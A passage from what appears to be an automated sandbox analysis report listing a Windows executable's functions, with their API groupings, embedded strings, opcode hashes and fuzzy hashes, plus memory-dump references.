                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                              • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                              Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                              • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                              Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                              • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780

                                                              Non-executed Functions

                                                              Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                              • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                              Function 0000000140013021 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                              • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                              Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
                                                              • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                              • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                              Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              • API String ID: 1740785346-287042676
                                                              • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                              • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                              Function 0000000140016CC4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 298514914-0
                                                              • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                              • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                              Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              • API String ID: 1554701960-0
                                                              • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                              • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                              Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              • API String ID: 1570244450-0
                                                              • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                              • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                              Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              • API String ID: 3383493704-0
                                                              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                              Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                              • API String ID: 938261879-1339284965
                                                              • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                              • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                              Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              • API String ID: 2527101397-0
                                                              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                              Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              • API String ID: 2472784365-0
                                                              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                              Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 458812214-0
                                                              • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                              • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                              Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              Function 00000001400117FC Relevance: 6.3, APIs: 5, Instructions: 99memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID:
                                                              • API String ID: 2544007295-0
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Function 00000001400130CB Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              Function 00000001400136B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
